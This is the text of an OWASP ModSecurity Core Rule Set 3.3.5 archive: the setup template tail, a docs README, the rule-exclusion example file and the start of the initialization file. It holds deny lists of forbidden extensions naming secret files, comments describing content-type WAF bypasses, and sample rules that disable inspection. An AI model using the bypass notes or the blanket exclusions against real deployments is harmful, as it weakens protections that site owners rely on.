tx.enforce_bodyproc_urlencoded (Enforce Body Processor URLENCODED) # defined below. Enabling it closes a possible bypass of CRS. # # Uncomment this rule to change the default: # #SecAction \ # "id:900000,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.paranoia_level=1" # It is possible to execute rules from a higher paranoia level but not include # them in the anomaly scoring. This allows you to take a well-tuned system on # paranoia level 1 and add rules from paranoia level 2 without having to fear # the new rules would lead to false positives that raise your score above the # threshold. # This optional feature is enabled by uncommenting the following rule and # setting the tx.executing_paranoia_level. # Technically, rules up to the level defined in tx.executing_paranoia_level # will be executed, but only the rules up to tx.paranoia_level affect the # anomaly scores. # By default, tx.executing_paranoia_level is set to tx.paranoia_level. # tx.executing_paranoia_level must not be lower than tx.paranoia_level. # # Please notice that setting tx.executing_paranoia_level to a higher paranoia # level results in a performance impact that is equally high as setting # tx.paranoia_level to said level. # #SecAction \ # "id:900001,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.executing_paranoia_level=1" # # -- [[ Enforce Body Processor URLENCODED ]] ----------------------------------- # # ModSecurity selects the body processor based on the Content-Type request # header. But clients are not always setting the Content-Type header for their # request body payloads. This will leave ModSecurity with limited vision into # the payload. The variable tx.enforce_bodyproc_urlencoded lets you force the # URLENCODED body processor in these situations. This is off by default, as it # implies a change of the behaviour of ModSecurity beyond CRS (the body # processor applies to all rules, not only CRS) and because it may lead to # false positives already on paranoia level 1. However, enabling this variable # closes a possible bypass of CRS so it should be considered. # # Uncomment this rule to change the default: # #SecAction \ # "id:900010,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.enforce_bodyproc_urlencoded=1" # # -- [[ Anomaly Mode Severity Levels ]] ---------------------------------------- # # Each rule in the CRS has an associated severity level. # These are the default scoring points for each severity level. # These settings will be used to increment the anomaly score if a rule matches. # You may adjust these points to your liking, but this is usually not needed. # # - CRITICAL severity: Anomaly Score of 5. # Mostly generated by the application attack rules (93x and 94x files). # - ERROR severity: Anomaly Score of 4. # Generated mostly from outbound leakage rules (95x files). # - WARNING severity: Anomaly Score of 3. # Generated mostly by malicious client rules (91x files). # - NOTICE severity: Anomaly Score of 2. # Generated mostly by the protocol rules (92x files). # # In anomaly mode, these scores are cumulative. # So it's possible for a request to hit multiple rules. # # (Note: In this file, we use 'phase:1' to set CRS configuration variables. # In general, 'phase:request' is used. However, we want to make absolutely sure # that all configuration variables are set before the CRS rules are processed.) # #SecAction \ # "id:900100,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.critical_anomaly_score=5,\ # setvar:tx.error_anomaly_score=4,\ # setvar:tx.warning_anomaly_score=3,\ # setvar:tx.notice_anomaly_score=2" # # -- [[ Anomaly Mode Blocking Threshold Levels ]] ------------------------------ # # Here, you can specify at which cumulative anomaly score an inbound request, # or outbound response, gets blocked. # # Most detected inbound threats will give a critical score of 5. # Smaller violations, like violations of protocol/standards, carry lower scores. # # [ At default value ] # If you keep the blocking thresholds at the defaults, the CRS will work # similarly to previous CRS versions: a single critical rule match will cause # the request to be blocked and logged. # # [ Using higher values ] # If you want to make the CRS less sensitive, you can increase the blocking # thresholds, for instance to 7 (which would require multiple rule matches # before blocking) or 10 (which would require at least two critical alerts - or # a combination of many lesser alerts), or even higher. However, increasing the # thresholds might cause some attacks to bypass the CRS rules or your policies. # # [ New deployment strategy: Starting high and decreasing ] # It is a common practice to start a fresh CRS installation with elevated # anomaly scoring thresholds (>100) and then lower the limits as your # confidence in the setup grows. You may also look into the Sampling # Percentage section below for a different strategy to ease into a new # CRS installation. # # [ Anomaly Threshold / Paranoia Level Quadrant ] # # High Anomaly Limit | High Anomaly Limit # Low Paranoia Level | High Paranoia Level # -> Fresh Site | -> Experimental Site # ------------------------------------------------------ # Low Anomaly Limit | Low Anomaly Limit # Low Paranoia Level | High Paranoia Level # -> Standard Site | -> High Security Site # # Uncomment this rule to change the defaults: # #SecAction \ # "id:900110,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.inbound_anomaly_score_threshold=5,\ # setvar:tx.outbound_anomaly_score_threshold=4" # # -- [[ Application Specific Rule Exclusions ]] ---------------------------------------- # # Some well-known applications may undertake actions that appear to be # malicious. This includes actions such as allowing HTML or Javascript within # parameters. In such cases the CRS aims to prevent false positives by allowing # administrators to enable prebuilt, application specific exclusions on an # application by application basis. # These application specific exclusions are distinct from the rules that would # be placed in the REQUEST-900-EXCLUSION-RULES-BEFORE-CRS configuration file as # they are prebuilt for specific applications. The 'REQUEST-900' file is # designed for users to add their own custom exclusions. Note, using these # application specific exclusions may loosen restrictions of the CRS, # especially if used with an application they weren't designed for. As a result # they should be applied with care. # To use this functionality you must specify a supported application. To do so # uncomment rule 900130. In addition to uncommenting the rule you will need to # specify which application(s) you'd like to enable exclusions for. Only a # (very) limited set of applications are currently supported, please use the # filenames prefixed with 'REQUEST-903' to guide you in your selection. # Such filenames use the following convention: # REQUEST-903.9XXX-{APPNAME}-EXCLUSIONS-RULES.conf # # It is recommended if you run multiple web applications on your site to limit # the effects of the exclusion to only the path where the excluded webapp # resides using a rule similar to the following example: # SecRule REQUEST_URI "@beginsWith /wordpress/" setvar:tx.crs_exclusions_wordpress=1 # # Modify and uncomment this rule to select which application: # #SecAction \ # "id:900130,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.crs_exclusions_cpanel=1,\ # setvar:tx.crs_exclusions_drupal=1,\ # setvar:tx.crs_exclusions_dokuwiki=1,\ # setvar:tx.crs_exclusions_nextcloud=1,\ # setvar:tx.crs_exclusions_wordpress=1,\ # setvar:tx.crs_exclusions_xenforo=1" # # -- [[ HTTP Policy Settings ]] ------------------------------------------------ # # This section defines your policies for the HTTP protocol, such as: # - allowed HTTP versions, HTTP methods, allowed request Content-Types # - forbidden file extensions (e.g. .bak, .sql) and request headers (e.g. Proxy) # # These variables are used in the following rule files: # - REQUEST-911-METHOD-ENFORCEMENT.conf # - REQUEST-912-DOS-PROTECTION.conf # - REQUEST-920-PROTOCOL-ENFORCEMENT.conf # HTTP methods that a client is allowed to use. # Default: GET HEAD POST OPTIONS # Example: for RESTful APIs, add the following methods: PUT PATCH DELETE # Example: for WebDAV, add the following methods: CHECKOUT COPY DELETE LOCK # MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH PUT UNLOCK # Uncomment this rule to change the default. #SecAction \ # "id:900200,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'" # Content-Types that a client is allowed to send in a request. # Default: |application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| # |text/xml| |application/xml| |application/soap+xml| |application/json| # |application/cloudevents+json| |application/cloudevents-batch+json| # # Please note, that the rule where CRS uses this variable (920420) evaluates it with operator # `@within`, which is case sensitive, but uses t:lowercase. You must add your whole custom # Content-Type with lowercase. # # Bypass Warning: some applications may not rely on the content-type request header in order # to parse the request body. This could make an attacker able to send malicious URLENCODED/JSON/XML # payloads without being detected by the WAF. Allowing request content-type that doesn't activate any # body processor (for example: "text/plain", "application/x-amf", "application/octet-stream", etc..) # could lead to a WAF bypass. For example, a malicious JSON payload submitted with a "text/plain" # content type may still be interpreted as JSON by a backend application but would not trigger the # JSON body parser at the WAF, leading to a bypass. # # To prevent blocking request with not allowed content-type by default, you can create an exclusion # rule that removes rule 920420. For example: # SecRule REQUEST_HEADERS:Content-Type "@rx ^text/plain" \ # "id:1234,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # ctl:ruleRemoveById=920420,\ # chain" # SecRule REQUEST_URI "@rx ^/foo/bar" "t:none" # # Uncomment this rule to change the default. # #SecAction \ # "id:900220,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_request_content_type=|application/x-www-form-urlencoded| |multipart/form-data| |multipart/related| |text/xml| |application/xml| |application/soap+xml| |application/json| |application/cloudevents+json| |application/cloudevents-batch+json|'" # Allowed HTTP versions. # Default: HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 # Example for legacy clients: HTTP/0.9 HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0 # Note that some web server versions use 'HTTP/2', some 'HTTP/2.0', so # we include both version strings by default. # Uncomment this rule to change the default. #SecAction \ # "id:900230,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_http_versions=HTTP/1.0 HTTP/1.1 HTTP/2 HTTP/2.0'" # Forbidden file extensions. # Guards against unintended exposure of development/configuration files. # Default: .asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/ # Example: .bak/ .config/ .conf/ .db/ .ini/ .log/ .old/ .pass/ .pdb/ .rdb/ .sql/ # Uncomment this rule to change the default. #SecAction \ # "id:900240,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.restricted_extensions=.asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/'" # Forbidden request headers. # Header names should be lowercase, enclosed by /slashes/ as delimiters. # Default: /accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/ # # Note: Accept-Charset is a deprecated header that should not be used by clients and # ignored by servers. It can be used for a response WAF bypass, by asking for a charset # that the WAF cannot decode. # Reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Charset # # Note: Content-Encoding is used to list any encodings that have been applied to the # original payload. It is only used for compression, which isn't supported by CRS by # default since it blocks newlines and null bytes inside the request body. Most # compression algorithms require at least null bytes per RFC. Blocking it shouldn't # break anything and increases security since ModSecurity is incapable of properly # scanning compressed request bodies. # # Note: Blocking Proxy header prevents 'httpoxy' vulnerability: https://httpoxy.org # # Uncomment this rule to change the default. #SecAction \ # "id:900250,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.restricted_headers=/accept-charset/ /content-encoding/ /proxy/ /lock-token/ /content-range/ /if/'" # File extensions considered static files. # Extensions include the dot, lowercase, enclosed by /slashes/ as delimiters. # Used in DoS protection rule. See section "Anti-Automation / DoS Protection". # Default: /.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/ # Uncomment this rule to change the default. #SecAction \ # "id:900260,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.static_extensions=/.jpg/ /.jpeg/ /.png/ /.gif/ /.js/ /.css/ /.ico/ /.svg/ /.webp/'" # Content-Types charsets that a client is allowed to send in a request. # Default: utf-8|iso-8859-1|iso-8859-15|windows-1252 # Uncomment this rule to change the default. # Use "|" to separate multiple charsets like in the rule defining # tx.allowed_request_content_type. #SecAction \ # "id:900280,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.allowed_request_content_type_charset=utf-8|iso-8859-1|iso-8859-15|windows-1252'" # # -- [[ HTTP Argument/Upload Limits ]] ----------------------------------------- # # Here you can define optional limits on HTTP get/post parameters and uploads. # This can help to prevent application specific DoS attacks. # # These values are checked in REQUEST-920-PROTOCOL-ENFORCEMENT.conf. # Beware of blocking legitimate traffic when enabling these limits. # # Block request if number of arguments is too high # Default: unlimited # Example: 255 # Uncomment this rule to set a limit. #SecAction \ # "id:900300,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.max_num_args=255" # Block request if the length of any argument name is too high # Default: unlimited # Example: 100 # Uncomment this rule to set a limit. #SecAction \ # "id:900310,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.arg_name_length=100" # Block request if the length of any argument value is too high # Default: unlimited # Example: 400 # Uncomment this rule to set a limit. #SecAction \ # "id:900320,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.arg_length=400" # Block request if the total length of all combined arguments is too high # Default: unlimited # Example: 64000 # Uncomment this rule to set a limit. #SecAction \ # "id:900330,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.total_arg_length=64000" # Block request if the file size of any individual uploaded file is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ # "id:900340,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.max_file_size=1048576" # Block request if the total size of all combined uploaded files is too high # Default: unlimited # Example: 1048576 # Uncomment this rule to set a limit. #SecAction \ # "id:900350,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.combined_file_sizes=1048576" # # -- [[ Easing In / Sampling Percentage ]] ------------------------------------- # # Adding the Core Rule Set to an existing productive site can lead to false # positives, unexpected performance issues and other undesired side effects. # # It can be beneficial to test the water first by enabling the CRS for a # limited number of requests only and then, when you have solved the issues (if # any) and you have confidence in the setup, to raise the ratio of requests # being sent into the ruleset. # # Adjust the percentage of requests that are funnelled into the Core Rules by # setting TX.sampling_percentage below. The default is 100, meaning that every # request gets checked by the CRS. The selection of requests, which are going # to be checked, is based on a pseudo random number generated by ModSecurity. # # If a request is allowed to pass without being checked by the CRS, there is no # entry in the audit log (for performance reasons), but an error log entry is # written. If you want to disable the error log entry, then issue the # following directive somewhere after the inclusion of the CRS # (E.g., RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf). # # SecRuleUpdateActionById 901150 "nolog" # # ATTENTION: If this TX.sampling_percentage is below 100, then some of the # requests will bypass the Core Rules completely and you lose the ability to # protect your service with ModSecurity. # # Uncomment this rule to enable this feature: # #SecAction "id:900400,\ # phase:1,\ # pass,\ # nolog,\ # setvar:tx.sampling_percentage=100" # # -- [[ Project Honey Pot HTTP Blacklist ]] ------------------------------------ # # Optionally, you can check the client IP address against the Project Honey Pot # HTTPBL (dnsbl.httpbl.org). In order to use this, you need to register to get a # free API key. Set it here with SecHttpBlKey. # # Project Honeypot returns multiple different malicious IP types. # You may specify which you want to block by enabling or disabling them below. # # Ref: https://www.projecthoneypot.org/httpbl.php # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecHttpBlKey # # Uncomment these rules to use this feature: # #SecHttpBlKey XXXXXXXXXXXXXXXXX #SecAction "id:900500,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.block_search_ip=1,\ # setvar:tx.block_suspicious_ip=1,\ # setvar:tx.block_harvester_ip=1,\ # setvar:tx.block_spammer_ip=1" # # -- [[ GeoIP Database ]] ------------------------------------------------------ # # There are some rulesets that inspect geolocation data of the client IP address # (geoLookup). The CRS uses geoLookup to implement optional country blocking. # # To use geolocation, we make use of the MaxMind GeoIP database. # This database is not included with the CRS and must be downloaded. # # There are two formats for the GeoIP database. ModSecurity v2 uses GeoLite (.dat files), # and ModSecurity v3 uses GeoLite2 (.mmdb files). # # If you use ModSecurity 3, MaxMind provides a binary for updating GeoLite2 files, # see https://github.com/maxmind/geoipupdate. # # Download the package for your OS, and read https://dev.maxmind.com/geoip/geoipupdate/ # for configuration options. # # Warning: GeoLite (not GeoLite2) databases are considered legacy, and not being updated anymore. # See https://support.maxmind.com/geolite-legacy-discontinuation-notice/ for more info. # # Therefore, if you use ModSecurity v2, you need to regenerate updated .dat files # from CSV files first. # # You can achieve this using https://github.com/sherpya/geolite2legacy # Pick the zip files from maxmind site: # https://geolite.maxmind.com/download/geoip/database/GeoLite2-Country-CSV.zip # # Follow the guidelines for installing the tool and run: # ./geolite2legacy.py -i GeoLite2-Country-CSV.zip \ # -f geoname2fips.csv -o /usr/share/GeoliteCountry.dat # # Update the database regularly, see Step 3 of the configuration link above. # # By default, when you execute `sudo geoipupdate` on Linux, files from the free database # will be downloaded to `/usr/share/GeoIP` (both v1 and v2). # # Then choose from: # - `GeoLite2-Country.mmdb` (if you are using ModSecurity v3) # - `GeoLiteCountry.dat` (if you are using ModSecurity v2) # # Ref: http://blog.spiderlabs.com/2010/10/detecting-malice-with-modsecurity-geolocation-data.html # Ref: http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html # # Uncomment only one of the next rules here to use this feature. # Choose the one depending on the ModSecurity version you are using, and change the path accordingly: # # For ModSecurity v3: #SecGeoLookupDB /usr/share/GeoIP/GeoLite2-Country.mmdb # For ModSecurity v2 (points to the converted one): #SecGeoLookupDB /usr/share/GeoIP/GeoLiteCountry.dat # # -=[ Block Countries ]=- # # Rules in the IP Reputation file can check the client against a list of high # risk country codes. These countries have to be defined in the variable # tx.high_risk_country_codes via their ISO 3166 two-letter country code: # https://en.wikipedia.org/wiki/ISO_3166-1_alpha-2#Officially_assigned_code_elements # # If you are sure that you are not getting any legitimate requests from a given # country, then you can disable all access from that country via this variable. # The rule performing the test has the rule id 910100. # # This rule requires SecGeoLookupDB to be enabled and the GeoIP database to be # downloaded (see the section "GeoIP Database" above.) # # By default, the list is empty. A list used by some sites was the following: # setvar:'tx.high_risk_country_codes=UA ID YU LT EG RO BG TR RU PK MY CN'" # # Uncomment this rule to use this feature: # #SecAction \ # "id:900600,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.high_risk_country_codes='" # # -- [[ Anti-Automation / DoS Protection ]] ------------------------------------ # # Optional DoS protection against clients making requests too quickly. # # When a client is making more than 100 requests (excluding static files) within # 60 seconds, this is considered a 'burst'. After two bursts, the client is # blocked for 600 seconds. # # Requests to static files are not counted towards DoS; they are listed in the # 'tx.static_extensions' setting, which you can change in this file (see # section "HTTP Policy Settings"). # # For a detailed description, see rule file REQUEST-912-DOS-PROTECTION.conf. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900700,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:'tx.dos_burst_time_slice=60',\ # setvar:'tx.dos_counter_threshold=100',\ # setvar:'tx.dos_block_timeout=600'" # # -- [[ Check UTF-8 encoding ]] ------------------------------------------------ # # The CRS can optionally check request contents for invalid UTF-8 encoding. # We only want to apply this check if UTF-8 encoding is actually used by the # site; otherwise it will result in false positives. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900950,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.crs_validate_utf8_encoding=1" # # -- [[ Blocking Based on IP Reputation ]] ------------------------------------ # # Blocking based on reputation is permanent in the CRS. Unlike other rules, # which look at the individual request, the blocking of IPs is based on # a persistent record in the IP collection, which remains active for a # certain amount of time. # # There are two ways an individual client can become flagged for blocking: # - External information (RBL, GeoIP, etc.) # - Internal information (Core Rules) # # The record in the IP collection carries a flag, which tags requests from # individual clients with a flag named IP.reput_block_flag. # But the flag alone is not enough to have a client blocked. There is also # a global switch named tx.do_reput_block. This is off by default. If you set # it to 1 (=On), requests from clients with the IP.reput_block_flag will # be blocked for a certain duration. # # Variables # ip.reput_block_flag Blocking flag for the IP collection record # ip.reput_block_reason Reason (= rule message) that caused to blocking flag # tx.do_reput_block Switch deciding if we really block based on flag # tx.reput_block_duration Setting to define the duration of a block # # It may be important to know, that all the other core rules are skipped for # requests, when it is clear that they carry the blocking flag in question. # # Uncomment this rule to use this feature: # #SecAction \ # "id:900960,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.do_reput_block=1" # # Uncomment this rule to change the blocking time: # Default: 300 (5 minutes) # #SecAction \ # "id:900970,\ # phase:1,\ # nolog,\ # pass,\ # t:none,\ # setvar:tx.reput_block_duration=300" # # -- [[ Collection timeout ]] -------------------------------------------------- # # Set the SecCollectionTimeout directive from the ModSecurity default (1 hour) # to a lower setting which is appropriate to most sites. # This increases performance by cleaning out stale collection (block) entries. # # This value should be greater than or equal to: # tx.reput_block_duration (see section "Blocking Based on IP Reputation") and # tx.dos_block_timeout (see section "Anti-Automation / DoS Protection"). # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecCollectionTimeout # Please keep this directive uncommented. # Default: 600 (10 minutes) SecCollectionTimeout 600 # # -- [[ End of setup ]] -------------------------------------------------------- # # The CRS checks the tx.crs_setup_version variable to ensure that the setup # has been loaded. If you are not planning to use this setup template, # you must manually set the tx.crs_setup_version variable before including # the CRS rules/* files. # # The variable is a numerical representation of the CRS version number. # E.g., v3.0.0 is represented as 300. # SecAction \ "id:900990,\ phase:1,\ pass,\ t:none,\ nolog,\ setvar:tx.crs_setup_version=335" modsecurity-crs-3.3.5/docs/000077500000000000000000000000001446122515100156075ustar00rootroot00000000000000modsecurity-crs-3.3.5/docs/README000066400000000000000000000011351446122515100164670ustar00rootroot00000000000000Welcome to the OWASP Core Rule Set (CRS) documentation. The OWASP CRS documentation is generated as a Sphinx project and is stored in a separate Github repository. While the documentation is available as part of the CRS project it is provided in the form of a git-submodule. Using a git-submodule allow us to update the documentation without making changes to the main rule repository. You can download the documentation using git: $ git submodule init $ git submodule update Alternatively, the latest version of the documentation is available at https://www.modsecurity.org/CRS/Documentation/ modsecurity-crs-3.3.5/rules/000077500000000000000000000000001446122515100160115ustar00rootroot00000000000000modsecurity-crs-3.3.5/rules/REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example000066400000000000000000000167521446122515100256070ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # The purpose of this file is to hold LOCAL exceptions for your site. The # types of rules that would go into this file are one where you want to # short-circuit inspection and allow certain transactions to pass through # inspection or if you want to alter rules that are applied. # # This file is named REQUEST-900-EXCLUSION-RULES-BEFORE-CRS.conf.example for a # very specific reason. Files affixed with the .example extension are designed # to contain user created/modified data. The '.example'. extension should be # renamed to end in .conf. The advantage of this is that when OWASP CRS is # updated, the updates will not overwrite a user generated configuration file. # # As a result of this design paradigm users are encouraged NOT to directly # modify rules. Instead they should use this # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and the # RESPONSE-999-EXCLUSION-RULES-AFTER-CRS file to modify OWASP rules using # methods similar to the examples specified below. # # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS and # RESPONSE-999-EXCLUSION-RULES-AFTER-CRS serve different purposes. ModSecurity # effectively maintains two different context: startup, and per transaction. # As a rule, directives are processed within the startup context. While they # can affect the per transaction context they generally remain fixed during the # execution of ModSecurity. # # As a result if one wanted to disable a rule at bootup the SecRuleRemoveById # directive or one of its siblings would have to be placed AFTER the rule is # listed, otherwise it will not have knowledge of the rules existence (since # these rules are read in at the same time). This means that when using # directives that effect SecRules, these exceptions should be placed AFTER all # the existing rules. This is why RESPONSE-999-EXCLUSION-RULES-AFTER-CRS is # designed such that it loads LAST. # # Conversely, ModSecurity supports several actions that can change the state of # the underlying configuration during the per transaction context, this is when # rules are being processed. Generally, these are accomplished by using the # 'ctl' action. As these are part of a rule, they will be evaluated in the # order rules are applied (by physical location, considering phases). As a # result of this ordering a 'ctl' action should be placed with consideration to # when it will be executed. This is particularly relevant for the 'ctl' options # that involve modifying ID's (such as ruleRemoveById). In these cases it is # important that such rules are placed BEFORE the rule ID they will affect. # Unlike the setup context, by the time we process rules in the per-transaction # context, we are already aware of all the rule ID's. It is by this logic that # we include rules such as this BEFORE all the remaining rules. As a result # REQUEST-900-EXCLUSION-RULES-BEFORE-CRS is designed to load FIRST. # # As a general rule: # ctl:ruleEngine -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetById -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetByMsg -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # ctl:ruleRemoveTargetByTag -> place in REQUEST-900-EXCLUSION-RULES-BEFORE-CRS # # SecRuleRemoveById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleRemoveByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleRemoveByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateActionById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetById -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetByMsg -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # SecRuleUpdateTargetByTag -> place in RESPONSE-999-EXCLUSION-RULES-AFTER-CRS # # # What follows are a group of examples that show you how to perform rule # exclusions. # # # Example Exclusion Rule: Disable inspection for an authorized client # # This ruleset allows you to control how ModSecurity will handle traffic # originating from Authorized Vulnerability Scanning (AVS) sources. See # related blog post - # http://blog.spiderlabs.com/2010/12/advanced-topic-of-the-week-handling-authorized-scanning-traffic.html # # White-list ASV network block (no blocking or logging of AVS traffic) Update # IP network block as appropriate for your AVS traffic # # ModSec Rule Exclusion: Disable Rule Engine for known ASV IP # SecRule REMOTE_ADDR "@ipMatch 192.168.1.100" \ # "id:1000,\ # phase:1,\ # pass,\ # nolog,\ # ctl:ruleEngine=Off" # # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for an individual rule # # This rule shows how to conditionally exclude the "password" # parameter for rule 942100 when the REQUEST_URI is /index.php # ModSecurity Rule Exclusion: 942100 SQL Injection Detected via libinjection # # SecRule REQUEST_URI "@beginsWith /index.php" \ # "id:1001,\ # phase:1,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetById=942100;ARGS:password" # # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for only certain attacks # # Attack rules within the CRS are tagged, with tags such as 'attack-lfi', # 'attack-sqli', 'attack-xss', 'attack-injection-php', et cetera. # # ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd # for all rules tagged attack-sqli # SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ # "id:1002,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:pwd" # # Example Exclusion Rule: Removing a specific ARGS parameter from inspection # for all CRS rules # # This rule illustrates that we can use tagging very effectively to whitelist a # common false positive across an entire ModSecurity instance. This can be done # because every rule in OWASP_CRS is tagged with OWASP_CRS. This will NOT # affect custom rules. # # ModSecurity Rule Exclusion: Disable inspection of ARGS:pwd # for all CRS rules # SecRule REQUEST_FILENAME "@endsWith /wp-login.php" \ # "id:1003,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pwd" # # Example Exclusion Rule: Removing a range of rules # # This rule illustrates that we can remove a rule range via a ctl action. # This uses the fact, that rules are grouped by topic in rule files covering # a certain id range. # # ModSecurity Rule Exclusion: Disable all SQLi and XSS rules # SecRule REQUEST_FILENAME "@beginsWith /admin" \ # "id:1004,\ # phase:2,\ # pass,\ # nolog,\ # ctl:ruleRemoveById=941000-942999" # # # The application specific rule exclusion files # REQUEST-903.9001-DRUPAL-EXCLUSION-RULES.conf # REQUEST-903.9002-WORDPRESS-EXCLUSION-RULES.conf # bring additional examples which can be useful then tuning a service. modsecurity-crs-3.3.5/rules/REQUEST-901-INITIALIZATION.conf000066400000000000000000000331151446122515100224470ustar00rootroot00000000000000# ------------------------------------------------------------------------ # OWASP ModSecurity Core Rule Set ver.3.3.5 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. # # The OWASP ModSecurity Core Rule Set is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # This file REQUEST-901-INITIALIZATION.conf initializes the Core Rules # and performs preparatory actions. It also fixes errors and omissions # of variable definitions in the file crs-setup.conf. # The setup.conf can and should be edited by the user, this file # is part of the CRS installation and should not be altered. # # # -=[ Rules Version ]=- # # Rule version data is added to the "Producer" line of Section H of the Audit log: # # - Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); OWASP_CRS/3.1.0. # # Ref: https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual#wiki-SecComponentSignature # SecComponentSignature "OWASP_CRS/3.3.5" # # -=[ Default setup values ]=- # # The CRS checks the tx.crs_setup_version variable to ensure that the setup # file is included at the correct time. This detects situations where # necessary settings are not defined, for instance if the file # inclusion order is incorrect, or if the user has forgotten to # include the crs-setup.conf file. # # If you are upgrading from an earlier version of the CRS and you are # getting this error, please make a new copy of the setup template # crs-setup.conf.example to crs-setup.conf, and re-apply your policy # changes. There have been many changes in settings syntax from CRS2 # to CRS3, so an old setup file may cause unwanted behavior. # # If you are not planning to use the crs-setup.conf template, you must # manually set the 